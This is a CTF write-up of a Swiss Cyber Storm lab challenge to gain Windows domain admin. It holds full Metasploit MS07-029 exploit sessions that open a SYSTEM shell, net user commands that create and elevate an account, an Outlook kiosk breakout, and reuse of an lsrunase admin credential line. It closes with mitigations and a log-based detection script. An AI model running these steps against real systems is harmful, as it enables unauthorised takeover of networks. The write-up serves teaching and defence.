Thice.nl

Thice Security

Swiss Cyber Storm write-up 1: CarGame Challenge 4

24/05/2011, by Thice, category CTF

This article is a write-up of the Swiss Cyber Storm CarGame Challenge 4 (February 2011). For more info on the Swiss Cyber Storm Conference please check my post about the conference here.

I only joined the CarGame at level 4, which meant I could no longer qualify to play the CarGame challenge during the conference. However, since the challenges seemed fun, I did the last two CarGame challenges anyway. The number and title of this challenge were:

  • 7031 Gain Windows Domain Admin Privileges

I submitted my solution and it was accepted by the organisation; however, I do not know whether this was the solution the organisation expected, or whether other participants found other solutions.

Challenge Description

Taken from the Hacking-Lab website:

We provide a Microsoft Windows 2003 Active Directory infrastructure consisting of a terminal server (csl-ts.compa.ny) and the Active Directory (csl-ad.compa.ny) itself. You also have a standard user account in the directory. Please use one of the following user accounts:

You have a valid, unprivileged AD user in this wargame.
UserID: hacker10 or hacker11 or hacker12 or … until hacker30

Domain: COMPA

Password: compass
NOTE: You might be logged off in case other users use the same user name.

An OpenVPN connection is required to solve this wargame (DNS resolution, availability of the Microsoft servers).

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 1]

Goal of this Challenge

  • Gain Enterprise Domain Admin Privileges on the provided Microsoft Active Directory infrastructure. Prove you were there. Write your hack verbose journal and attach it to your solution submission.

Wargame Questions

Please use the SendSolution button within the Hacking-Lab to send your solution. We can’t accept e-mail solutions – Sorry. Please send the following information:

  1. How you were able to gain the Enterprise Domain Admin Privileges
  2. How to mitigate the risk
  3. Please attach Screenshots with your solution (proof)

Hacking csl-ad.compa.ny

An Nmap scan of the csl-ad.compa.ny host shows that the system has quite a few open ports. The output of the scan is shown below.

[email protected]:~$ nmap csl-ad.compa.ny

Starting Nmap 5.00 ( http://nmap.org ) at 2011-02-25 23:49 CET
Interesting ports on 192.168.200.64:
Not shown: 984 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1039/tcp open  unknown
1047/tcp open  unknown
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds

One of the open ports is the RDP (Remote Desktop Protocol) port; when connecting to it with the Linux rdesktop program we can see that the server is running Microsoft Windows 2003.

The number of exploits available for Microsoft Windows 2003 is not that high. One exploit that targets both Windows 2003 SP0 and SP1 is the one for MS07-029, a vulnerability in the RPC interface of the Microsoft DNS Server service. More information can be found on the Metasploit module page for this exploit:

http://www.metasploit.com/modules/exploit/windows/dcerpc/ms07_029_msdns_zonename

The exploit for this vulnerability can be executed using the Metasploit Framework; the specific module (windows/dcerpc/ms07_029_msdns_zonename) and its options are shown below.

[email protected]:~# msfconsole

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 648 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11895 updated today (2011.03.08)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set rhost csl-ad.compa.ny
rhost => csl-ad.compa.ny
msf exploit(ms07_029_msdns_zonename) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp

msf exploit(ms07_029_msdns_zonename) > show options

Module options (exploit/windows/dcerpc/ms07_029_msdns_zonename):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST   csl-ad.compa.ny  yes       The target address
   RPORT   0                yes       The target port

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LPORT     4444             yes       The listen port
   RHOST     csl-ad.compa.ny  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

After setting all the options in the module the exploit is ready to be executed. The output of this exploit is shown below.

msf exploit(ms07_029_msdns_zonename) > exploit

[*] Connecting to the endpoint mapper service...
[*] Started bind handler
[*] Discovered Microsoft DNS Server RPC service on port 1047
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:csl-ad.compa.ny[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_ip_tcp:csl-ad.compa.ny[0] ...
[*] Sending exploit...
[*] Sending stage (240 bytes) to csl-ad.compa.ny
[*] Command shell session 1 opened (10.201.0.22:41264 -> 192.168.200.64:4444) at Tue Mar 08 08:01:52 -0500 2011
[-] Error: no response from dcerpc service

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

The exploit against csl-ad.compa.ny was successful and launched a remote shell (using the payload windows/shell/bind_tcp). Using the ipconfig command we can confirm that we are indeed on csl-ad.compa.ny (IP 192.168.200.64), and the whoami command shows that we are running as NT AUTHORITY\SYSTEM. The output of these commands is shown below.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.200.64
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.200.204

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Since we are running as SYSTEM we can use these privileges to create a new local admin account; the commands used for that and their output are shown below. Note that a domain controller has no separate local account database, so an account created with net user on csl-ad.compa.ny is a domain account, and the Administrators group it is added to is the domain's built-in Administrators group.

C:\WINDOWS\system32>net user hawkje password /add /domain
net user hawkje password /add /domain
The command completed successfully.

C:\WINDOWS\system32>net localgroup Administrators /add hawkje
net localgroup Administrators /add hawkje
The command completed successfully.

We now have a local admin user which we can use to log in to the system remotely; for this we use the Linux program rdesktop.

rdesktop csl-ad.compa.ny

The login and password that we will use are of the account we just created.

The screenshot below shows us being logged in as user ‘hawkje’ which has admin privileges. These admin privileges can be checked by using the net localgroup administrators command.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 2]

When opening the Active Directory settings we can find our account among the users. From there we can easily add our account to the Domain Admins group. The membership properties screen can be seen below.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 3]
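From the defender's side, the steps above leave a characteristic trail in the domain controller's security log: an account is created and, within minutes, added to Administrators and then Domain Admins. The following Python is an added example (not from the write-up) that correlates such events; the event IDs are the Windows 2003 security-log IDs (624 user created, 636 member added to a security-enabled local group, 632 member added to a global group), the field names are this example's own, and the sample events are constructed to mirror the write-up's actions.

```python
from datetime import datetime, timedelta

# Windows 2003 security-log event IDs for the actions the write-up performs.
USER_CREATED = 624          # "User Account Created"
GLOBAL_GROUP_ADD = 632      # member added to a security-enabled global group (e.g. Domain Admins)
LOCAL_GROUP_ADD = 636       # member added to a security-enabled local group (e.g. Administrators)
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
WINDOW = timedelta(minutes=30)

# Constructed sample events (field names are this example's own, not a real
# log format). Actions taken from the SYSTEM context are logged under the
# machine account, i.e. a name ending in '$'.
SAMPLE_EVENTS = [
    {"time": "2011-03-08 08:02:10", "id": 624, "actor": "CSL-AD$", "target": "hawkje", "group": None},
    {"time": "2011-03-08 08:02:40", "id": 636, "actor": "CSL-AD$", "target": "hawkje", "group": "Administrators"},
    {"time": "2011-03-08 08:15:00", "id": 632, "actor": "hawkje", "target": "hawkje", "group": "Domain Admins"},
    {"time": "2011-03-08 09:00:00", "id": 624, "actor": "helpdesk1", "target": "svc_backup", "group": None},
    {"time": "2011-03-08 11:00:00", "id": 636, "actor": "helpdesk1", "target": "svc_backup", "group": "Backup Operators"},
]

def ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def detect(events, window=WINDOW):
    """Return alerts as (kind, target, group) tuples, in event order."""
    created = {}                      # target account -> creation time
    alerts = []
    for e in sorted(events, key=ts):
        if e["id"] == USER_CREATED:
            created[e["target"]] = ts(e)
        elif e["id"] in (GLOBAL_GROUP_ADD, LOCAL_GROUP_ADD) and e["group"] in PRIVILEGED_GROUPS:
            kind = "privileged-group-add"
            if e["target"] in created and ts(e) - created[e["target"]] <= window:
                kind = "new-account-escalation"    # created and promoted within the window
            alerts.append((kind, e["target"], e["group"]))
            if e["actor"].endswith("$"):          # account management done from SYSTEM context
                alerts.append(("system-context-actor", e["target"], e["group"]))
    return alerts
```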

Alternative exploit

Besides the windows/dcerpc/ms07_029_msdns_zonename Metasploit module used above, the same vulnerability (MS07-029) can also be exploited with an alternative module, windows/smb/ms07_029_msdns_zonename, which reaches the DNS Server RPC interface over an SMB named pipe and therefore needs valid domain credentials (here the supplied hacker14 account). The configuration and the output of this module can be seen below.

msf exploit(ms03_026_dcom) > use windows/smb/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > show options

Module options (exploit/windows/smb/ms07_029_msdns_zonename):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST                    yes       The target address
   RPORT   445              yes       Set the SMB service port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(ms07_029_msdns_zonename) > set RHOST csl-ad.compa.ny
RHOST => csl-ad.compa.ny
msf exploit(ms07_029_msdns_zonename) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms07_029_msdns_zonename) > set SMBUSER hacker14
SMBUSER => hacker14
msf exploit(ms07_029_msdns_zonename) > set SMBPASS compass
SMBPASS => compass
msf exploit(ms07_029_msdns_zonename) > exploit

[*] Started bind handler
[*] Detected a Windows 2003 SP1 target...
[*] Trying target Windows 2003 Server SP1-SP2 English...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:csl-ad.compa.ny[\dnsserver] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:csl-ad.compa.ny[\dnsserver] ...
[*] Sending exploit...
[*] Sending stage (240 bytes) to csl-ad.compa.ny
[*] Command shell session 2 opened (10.201.0.22:40045 -> 192.168.200.64:4444) at Tue Mar 08 08:33:02 -0500 2011
[-] Error: no response from dcerpc service

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.200.64
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.200.204

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Hacking csl-ts.compa.ny

The csl-ts.compa.ny system does not need to be exploited to gain administrator access to the csl-ad.compa.ny system, and thus could be seen as being out of scope for this challenge. However, since the system is part of this exercise I decided to exploit it as well, in a totally different way than the csl-ad.compa.ny system.

As part of the challenge we received a set of user accounts. These user accounts can be used to log in to the csl-ts.compa.ny terminal server. The user account that will be used is the account hacker14 with password compass.

To connect to the csl-ts.compa.ny server we again use the Linux rdesktop program; the command shown below opens an RDP session to the system.

rdesktop csl-ts.compa.ny

When the RDP session to csl-ts.compa.ny is opened we notice that we do not get a normal Windows desktop, only a session with Outlook 2003. This means we have to break out of this Outlook 2003 session.

One way to break out of this session is to launch explorer.exe, which can be accomplished by getting an “Open” dialog in Windows. From Outlook this can for example be done by going to:

  • File –> Open –> Outlook Data File

This action is shown on the screenshot below.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 4]

In the “Open Outlook Data File” dialog screen we can browse to the Windows directory (C:\Windows\) and when we select “All Files (*.*)” as “Files of type:”, explorer.exe will show up. When we right click explorer.exe we can choose “Open” to execute it.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 5]

After executing explorer.exe a script window pops up; this script can be found in the Start menu, as shown in the next screenshot.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 6]

The script name is init_script.bat and it contains the following command:

C:\Scripts\lsrunase.exe /user:runbatch /password:/kh5nOVO/bbbjbP4XMVGkWm1e5WKzj71Aeg= /domain:CSL-TS
/command:do_stuff.bat /runpath:C:\Scripts\

The script seems to run the lsrunase.exe program and uses the runbatch account to do so. This runbatch account is part of the local administrators group as can be seen below after executing the net localgroup administrators command.

C:\Documents and Settings\hacker14>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
COMPA\Domain Admins
hackmin
ibuetler
runbatch
stefan
The command completed successfully.

The command in init_script.bat can easily be adjusted to execute other commands, which means we can execute arbitrary commands as the runbatch user, and since runbatch is a local admin account, as a local admin. Note that the encrypted password blob in the script is all lsrunase.exe needs, so the encryption offers no protection against anyone who can read the script. The easiest command to run is cmd.exe, which gives us a local admin command shell; it can be executed with the following adjustment to init_script.bat.

C:\Scripts\lsrunase.exe /user:runbatch /password:/kh5nOVO/bbbjbP4XMVGkWm1e5WKzj71Aeg= /domain:CSL-TS
/command:cmd.exe /runpath:C:\Scripts\

After executing this command from a cmd.exe command shell a new command shell will open with the runbatch (and thus local admin) rights. This command shell can then be abused to add a new local admin user. These actions can be seen in the screenshot below.

[Screenshot: Swiss Cyberstorm write up Car Game 4 - 7]

Mitigating the risk

To mitigate the risk I would propose the following actions to be taken on both of the systems:

  • Install the latest software and security updates from Microsoft.
  • Disable any unneeded services.
  • Activate a firewall on both systems or place both systems behind a hardware firewall. The firewall should block all traffic except what is needed for operational use, and only traffic from legitimate systems should be allowed.
  • Install and maintain an antivirus solution.
  • Disable and remove the init_script.bat script running on the csl-ts.compa.ny system.
  • Disable the execution of explorer.exe on the csl-ts.compa.ny system, or offer Outlook Web Access (OWA) instead of the current Outlook 2003 sessions.
  • Remove any unnecessary data from the systems, including the currently present old password dump files and exploit files.
